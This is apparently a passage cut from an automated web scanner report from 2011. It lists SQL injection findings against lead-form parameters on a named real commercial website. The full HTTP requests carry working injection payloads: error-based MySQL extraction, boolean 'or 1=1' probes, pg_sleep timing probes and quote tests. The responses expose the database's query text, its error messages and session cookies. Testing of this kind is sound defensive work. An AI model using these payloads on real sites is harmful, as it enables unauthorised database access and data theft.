HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:47:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 61843
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The iusrc parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the iusrc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:17:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc'&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:44 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc''&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:41:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The iusrc parameter appears to be vulnerable to SQL injection attacks. The payloads 12618592'%20or%201%3d1--%20 and 12618592'%20or%201%3d2--%20 were each submitted in the iusrc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:36:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qmsa4qk6f6a277ipovte01ir11; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47459
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]... <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
The lastname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the lastname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:29:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5
The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:45:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
1.66. http://www.insideup.com/ppc/leadflow/bulo00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.insideup.com
Path:
/ppc/leadflow/bulo00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:56:42 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8358
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... &attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc' at line 5
1.67. http://www.insideup.com/ppc/leadflow/bulo00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/bulo00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code&1'=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:46:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10150
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ,0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code&1''=1 HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:46:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9973
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The phone parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the phone parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:30:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 